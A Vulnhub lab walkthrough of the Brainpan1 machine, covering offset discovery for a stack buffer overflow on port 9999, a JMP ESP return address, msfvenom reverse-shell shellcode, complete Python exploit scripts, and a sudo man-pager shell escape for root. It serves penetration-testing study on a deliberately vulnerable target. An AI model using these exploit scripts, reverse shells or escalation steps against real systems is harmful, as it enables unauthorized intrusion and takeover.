Vulnhub Penetration Diary 10: brainpan-1

This article describes in detail how a vulnerability on port 9999 of the Vulnhub target Brainpan1 is found and exploited through a buffer overflow. The author first locates the overflow point through information gathering, then uses Metasploit tools to generate a unique character sequence that overwrites the EIP register, and builds the shellcode. Next, the byte order is adjusted to match the target's storage format and a reverse shell is created. Finally, the article covers executing commands on the target system and escalating privileges via sudo.
(Abstract generated automatically by CSDN.)

Preface

⏰ Date: 2023.7.22
🗺️ Target VM: https://www.vulnhub.com/entry/brainpan-1,51/
⚠️ All operations in this article were carried out in a simulated target environment; never use them against real systems without authorization.
🙏 My skills are limited; if you find errors, please point them out. Thank you for reading!
🎉 Follows 🔍, likes 👍, bookmarks ⭐️ and comments 📝 are welcome

Information Gathering

Port 9999 is running brainpan
Directory scanning finds /bin
Click the file to download it

Buffer Overflow

On a Windows machine, download Immunity Debugger and analyze the file.
Send a large number of characters to the program to locate the overflow point.
Generate the characters:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000


#!/usr/bin/python
import sys
import socket as so

buff = '''Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'''

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print("Usage Example: python %s 192.168.58.156 8080" % sys.argv[0])
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print("\n[+] Attempting to send buffer overflow to brainpan.exe...")
try:
    s.connect((server, port))
    # The pattern is plain ASCII; encode it so the script runs on Python 2 and 3
    s.send((buff + '\r\n').encode('latin-1'))
    print("\n[+] Completed!")
except so.error:
    print("[!] Unable to connect to brainpan.exe.")
finally:
    s.close()

EIP is overwritten with 35724134
Offset 524

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134 -l 1000
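As an added example (not part of the original post), the following Python 3 code re-implements the cyclic-pattern logic behind pattern_create.rb and pattern_offset.rb, so you can see why the EIP value 35724134 corresponds to offset 524. It assumes the default character set of pattern_create.rb (uppercase, lowercase, digit), which is the pattern visible in the script above.

```python
import string
import struct

# Character classes used by Metasploit's pattern_create.rb (default set).
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1...Aa9Ab0...Az9Ba0..., truncated to
    `length` bytes. Every 3-byte triple is unique, so any 4 consecutive
    bytes pin down exactly one position in the buffer."""
    chunks, total = [], 0
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                chunks.append(u + lo + d)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_hex, length=1000):
    """Return the offset in the pattern that landed in EIP, or None.

    The debugger shows EIP as a 32-bit number. x86 is little-endian, so the
    byte that sat lowest in memory is the low byte of that number; packing
    the value back with '<I' recovers the 4 characters in memory order."""
    value = int(eip_hex, 16)                 # accepts "35724134" or "0x35724134"
    needle = struct.pack("<I", value).decode("latin-1")  # 0x35724134 -> "4Ar5"
    pos = pattern_create(length).find(needle)
    return None if pos < 0 else pos


if __name__ == "__main__":
    print(pattern_offset("35724134"))  # 524: bytes of padding before the saved EIP
```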


#!/usr/bin/python
import sys
import socket as so

# The "C" bytes are optional; what matters is that the four B bytes land in EIP
buff = b"A" * 524 + b"B" * 4 + b"C" * (1000 - 524 - 4)

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print("Usage Example: python %s 192.168.58.156 8080" % sys.argv[0])
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print("\n[+] Attempting to send buffer overflow to brainpan.exe...")
try:
    s.connect((server, port))
    s.send(buff + b'\r\n')
    print("\n[+] Completed!")
except so.error:
    print("[!] Unable to connect to brainpan.exe.")
finally:
    s.close()

EIP is successfully overwritten by the four B bytes (the ASCII code of B in hex is 42).
EBP is 41414141, all A bytes.
ESP points into the part where our code will execute, which is all C bytes.
By the stack layout, the region ESP points to should sit after the saved EIP (possibly with a small gap in between).
Next, determine the address of a jmp esp instruction.
Look up the in-memory byte representation of jmp esp (\xff\xe4):
!mona find -s "\xff\xe4" -m brainpan.exe
The JMP ESP address obtained is 0x311712f3.
Generate the reverse shell; -b excludes the bad characters:

┌──(eric㉿Eric)-[/usr/share/metasploit-framework/tools/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LPORT=5555 LHOST=192.168.10.1 -e x86/shikata_ga_nai -b "\x00\x0a\x0b" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1745 bytes
buf =  b""
buf += b"\xdb\xd8\xd9\x74\x24\xf4\x5a\x33\xc9\xbf\xbe\xbf"
buf += b"\x25\xb9\xb1\x52\x83\xea\xfc\x31\x7a\x13\x03\xc4"
buf += b"\xac\xc7\x4c\xc4\x3b\x85\xaf\x34\xbc\xea\x26\xd1"
buf += b"\x8d\x2a\x5c\x92\xbe\x9a\x16\xf6\x32\x50\x7a\xe2"
buf += b"\xc1\x14\x53\x05\x61\x92\x85\x28\x72\x8f\xf6\x2b"
buf += b"\xf0\xd2\x2a\x8b\xc9\x1c\x3f\xca\x0e\x40\xb2\x9e"
buf += b"\xc7\x0e\x61\x0e\x63\x5a\xba\xa5\x3f\x4a\xba\x5a"
buf += b"\xf7\x6d\xeb\xcd\x83\x37\x2b\xec\x40\x4c\x62\xf6"
buf += b"\x85\x69\x3c\x8d\x7e\x05\xbf\x47\x4f\xe6\x6c\xa6"
buf += b"\x7f\x15\x6c\xef\xb8\xc6\x1b\x19\xbb\x7b\x1c\xde"
buf += b"\xc1\xa7\xa9\xc4\x62\x23\x09\x20\x92\xe0\xcc\xa3"
buf += b"\x98\x4d\x9a\xeb\xbc\x50\x4f\x80\xb9\xd9\x6e\x46"
buf += b"\x48\x99\x54\x42\x10\x79\xf4\xd3\xfc\x2c\x09\x03"
buf += b"\x5f\x90\xaf\x48\x72\xc5\xdd\x13\x1b\x2a\xec\xab"
buf += b"\xdb\x24\x67\xd8\xe9\xeb\xd3\x76\x42\x63\xfa\x81"
buf += b"\xa5\x5e\xba\x1d\x58\x61\xbb\x34\x9f\x35\xeb\x2e"
buf += b"\x36\x36\x60\xae\xb7\xe3\x27\xfe\x17\x5c\x88\xae"
buf += b"\xd7\x0c\x60\xa4\xd7\x73\x90\xc7\x3d\x1c\x3b\x32"
buf += b"\xd6\xe3\x14\x36\x27\x8c\x66\x46\x32\xff\xee\xa0"
buf += b"\x56\xef\xa6\x7b\xcf\x96\xe2\xf7\x6e\x56\x39\x72"
buf += b"\xb0\xdc\xce\x83\x7f\x15\xba\x97\xe8\xd5\xf1\xc5"
buf += b"\xbf\xea\x2f\x61\x23\x78\xb4\x71\x2a\x61\x63\x26"
buf += b"\x7b\x57\x7a\xa2\x91\xce\xd4\xd0\x6b\x96\x1f\x50"
buf += b"\xb0\x6b\xa1\x59\x35\xd7\x85\x49\x83\xd8\x81\x3d"
buf += b"\x5b\x8f\x5f\xeb\x1d\x79\x2e\x45\xf4\xd6\xf8\x01"
buf += b"\x81\x14\x3b\x57\x8e\x70\xcd\xb7\x3f\x2d\x88\xc8"
buf += b"\xf0\xb9\x1c\xb1\xec\x59\xe2\x68\xb5\x6a\xa9\x30"
buf += b"\x9c\xe2\x74\xa1\x9c\x6e\x87\x1c\xe2\x96\x04\x94"
buf += b"\x9b\x6c\x14\xdd\x9e\x29\x92\x0e\xd3\x22\x77\x30"
buf += b"\x40\x42\x52"

There is one problem with the address we obtained. The same address is represented differently when it is sent over the network and when the CPU stores it in memory; this is the big-endian versus little-endian distinction. Big-endian, little-endian and network byte order come up constantly in programming; network byte order generally means big-endian (for most network protocols). Endianness is defined by how multi-byte data types are laid out in memory: little-endian stores the low-order byte first (the low byte sits at the lowest memory address, so byte significance increases with the address); big-endian stores the high-order byte first ("first" meaning nearest the low memory address, the byte that would be written to disk first). The byte order a CPU uses natively is also called host byte order.

When the Python script sends the JMP ESP address to the target, the bytes go out in the order they are written, that is, big-endian as typed, but the x86 target reads the 32-bit value 311712f3 from memory little-endian. To overwrite the return address with 311712f3, the bytes must therefore be written reversed as "\xf3\x12\x17\x31" and placed in the earlier script where the four B bytes were.
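As an added example (not part of the original post), the byte-order point above worked through in Python 3: the same address serialized both ways, what an x86 CPU actually loads from each, and a check that the encoded bytes avoid the bad characters excluded with -b. The address and the bad-character set are the ones from this post; the function names are my own.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0b"   # bytes excluded with msfvenom -b in the post
JMP_ESP = 0x311712f3          # JMP ESP address the post found with mona


def to_bytes(value, order):
    """Serialize a 32-bit value byte by byte; order is 'little' or 'big'.
    Little-endian stores the least significant byte at the lowest address,
    which is why 0x311712f3 appears as f3 12 17 31 in memory on x86."""
    lsb_first = bytes((value >> (8 * i)) & 0xFF for i in range(4))
    return lsb_first if order == "little" else lsb_first[::-1]


def loaded_by_x86(raw):
    """The dword an x86 CPU loads from these 4 bytes (little-endian read)."""
    return struct.unpack("<I", raw)[0]


def find_bad_chars(data, bad=BAD_CHARS):
    """Map each forbidden byte present in data to the offsets where it
    occurs. An empty result means nothing would be truncated or rewritten
    by the target's input handling (NUL terminator, newline processing)."""
    hits = {}
    for i, b in enumerate(data):
        if b in bad:
            hits.setdefault(b, []).append(i)
    return hits


def check_return_address(address=JMP_ESP, bad=BAD_CHARS):
    """Encode the address for the target and confirm that the CPU would
    load it back unchanged and that none of its bytes is a bad character."""
    raw = to_bytes(address, "little")
    assert raw == struct.pack("<I", address)   # hand-rolled == struct idiom
    return loaded_by_x86(raw) == address and not find_bad_chars(raw, bad)


if __name__ == "__main__":
    # Sending the address as written (big-endian) makes the CPU load the
    # wrong value: 0xf3121731 instead of 0x311712f3.
    print(hex(loaded_by_x86(to_bytes(JMP_ESP, "big"))))
    print(to_bytes(JMP_ESP, "little"), check_return_address())
```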

Construction plan:
1. 524 A bytes to fill the normal buffer space;
2. \xf3\x12\x17\x31, the JMP ESP address, to redirect execution to the shellcode;
3. there is a gap between EIP and ESP, so add a run of \x90 (NOP) bytes, neither too long nor too short, so that the shellcode lands exactly at ESP;
4. then append the reverse shell generated by msf.

#!/usr/bin/python
import sys
import socket as so

buf =  b""
buf += b"\xbb\xfa\x94\x7e\xc6\xd9\xc1\xd9\x74\x24\xf4\x58"
buf += b"\x2b\xc9\xb1\x52\x31\x58\x12\x83\xc0\x04\x03\xa2"
buf += b"\x9a\x9c\x33\xae\x4b\xe2\xbc\x4e\x8c\x83\x35\xab"
buf += b"\xbd\x83\x22\xb8\xee\x33\x20\xec\x02\xbf\x64\x04"
buf += b"\x90\xcd\xa0\x2b\x11\x7b\x97\x02\xa2\xd0\xeb\x05"
buf += b"\x20\x2b\x38\xe5\x19\xe4\x4d\xe4\x5e\x19\xbf\xb4"
buf += b"\x37\x55\x12\x28\x33\x23\xaf\xc3\x0f\xa5\xb7\x30"
buf += b"\xc7\xc4\x96\xe7\x53\x9f\x38\x06\xb7\xab\x70\x10"
buf += b"\xd4\x96\xcb\xab\x2e\x6c\xca\x7d\x7f\x8d\x61\x40"
buf += b"\x4f\x7c\x7b\x85\x68\x9f\x0e\xff\x8a\x22\x09\xc4"
buf += b"\xf1\xf8\x9c\xde\x52\x8a\x07\x3a\x62\x5f\xd1\xc9"
buf += b"\x68\x14\x95\x95\x6c\xab\x7a\xae\x89\x20\x7d\x60"
buf += b"\x18\x72\x5a\xa4\x40\x20\xc3\xfd\x2c\x87\xfc\x1d"
buf += b"\x8f\x78\x59\x56\x22\x6c\xd0\x35\x2b\x41\xd9\xc5"
buf += b"\xab\xcd\x6a\xb6\x99\x52\xc1\x50\x92\x1b\xcf\xa7"
buf += b"\xd5\x31\xb7\x37\x28\xba\xc8\x1e\xef\xee\x98\x08"
buf += b"\xc6\x8e\x72\xc8\xe7\x5a\xd4\x98\x47\x35\x95\x48"
buf += b"\x28\xe5\x7d\x82\xa7\xda\x9e\xad\x6d\x73\x34\x54"
buf += b"\xe6\xbc\x61\x5c\xf7\x54\x70\x60\xe2\x17\xfd\x86"
buf += b"\x66\x48\xa8\x11\x1f\xf1\xf1\xe9\xbe\xfe\x2f\x94"
buf += b"\x81\x75\xdc\x69\x4f\x7e\xa9\x79\x38\x8e\xe4\x23"
buf += b"\xef\x91\xd2\x4b\x73\x03\xb9\x8b\xfa\x38\x16\xdc"
buf += b"\xab\x8f\x6f\x88\x41\xa9\xd9\xae\x9b\x2f\x21\x6a"
buf += b"\x40\x8c\xac\x73\x05\xa8\x8a\x63\xd3\x31\x97\xd7"
buf += b"\x8b\x67\x41\x81\x6d\xde\x23\x7b\x24\x8d\xed\xeb"
buf += b"\xb1\xfd\x2d\x6d\xbe\x2b\xd8\x91\x0f\x82\x9d\xae"
buf += b"\xa0\x42\x2a\xd7\xdc\xf2\xd5\x02\x65\x02\x9c\x0e"
buf += b"\xcc\x8b\x79\xdb\x4c\xd6\x79\x36\x92\xef\xf9\xb2"
buf += b"\x6b\x14\xe1\xb7\x6e\x50\xa5\x24\x03\xc9\x40\x4a"
buf += b"\xb0\xea\x40"

# 524 bytes of padding up to the saved return address, the JMP ESP address in
# little-endian order, a short NOP sled to bridge the gap to ESP, then the shellcode
buff = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 20 + buf

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print("Usage Example: python %s 192.168.58.156 8080" % sys.argv[0])
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print("\n[+] Attempting to send buffer overflow to brainpan.exe...")
try:
    s.connect((server, port))
    s.send(buff + b'\r\n')
    print("\n[+] Completed!")
except so.error:
    print("[!] Unable to connect to brainpan.exe.")
finally:
    s.close()

Because the reverse shell is a Windows shell, we land in the Windows sub-environment on the target.
Next, change it to a Linux reverse shell:

┌──(eric㉿Eric)-[/usr/share/metasploit-framework/tools/exploit]
└─$ msfvenom -p linux/x86/shell_reverse_tcp LPORT=5555 LHOST=192.168.58.153 -e x86/shikata_ga_nai -b "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of py file: 479 bytes
buf =  b""
buf += b"\xda\xc2\xba\xaf\xae\xc7\x61\xd9\x74\x24\xf4\x5e"
buf += b"\x2b\xc9\xb1\x12\x83\xc6\x04\x31\x56\x13\x03\xf9"
buf += b"\xbd\x25\x94\x34\x19\x5e\xb4\x65\xde\xf2\x51\x8b"
buf += b"\x69\x15\x15\xed\xa4\x56\xc5\xa8\x86\x68\x27\xca"
buf += b"\xae\xef\x4e\xa2\xf0\xb8\x8b\xab\x99\xba\xeb\xde"
buf += b"\xea\x32\x0a\x50\x6a\x15\x9c\xc3\xc0\x96\x97\x02"
buf += b"\xeb\x19\xf5\xac\x9a\x36\x89\x44\x0b\x66\x42\xf6"
buf += b"\xa2\xf1\x7f\xa4\x67\x8b\x61\xf8\x83\x46\xe1"

#!/usr/bin/python
import sys
import socket as so

buf =  b""
buf += b"\xda\xc2\xba\xaf\xae\xc7\x61\xd9\x74\x24\xf4\x5e"
buf += b"\x2b\xc9\xb1\x12\x83\xc6\x04\x31\x56\x13\x03\xf9"
buf += b"\xbd\x25\x94\x34\x19\x5e\xb4\x65\xde\xf2\x51\x8b"
buf += b"\x69\x15\x15\xed\xa4\x56\xc5\xa8\x86\x68\x27\xca"
buf += b"\xae\xef\x4e\xa2\xf0\xb8\x8b\xab\x99\xba\xeb\xde"
buf += b"\xea\x32\x0a\x50\x6a\x15\x9c\xc3\xc0\x96\x97\x02"
buf += b"\xeb\x19\xf5\xac\x9a\x36\x89\x44\x0b\x66\x42\xf6"
buf += b"\xa2\xf1\x7f\xa4\x67\x8b\x61\xf8\x83\x46\xe1"

# Same layout as before: padding, little-endian JMP ESP address, NOP sled, Linux shellcode
buff = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 20 + buf

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print("Usage Example: python %s 192.168.58.156 8080" % sys.argv[0])
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print("\n[+] Attempting to send buffer overflow to brainpan.exe...")
try:
    s.connect((server, port))
    s.send(buff + b'\r\n')
    print("\n[+] Completed!")
except so.error:
    print("[!] Unable to connect to brainpan.exe.")
finally:
    s.close()


python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation via sudo

puck@brainpan:/home/puck$ sudo -l
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util # note the usage hint it prints
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual cp
-  (press RETURN)!/bin/bash    # typed at the man pager prompt; "!" runs a shell command from the pager

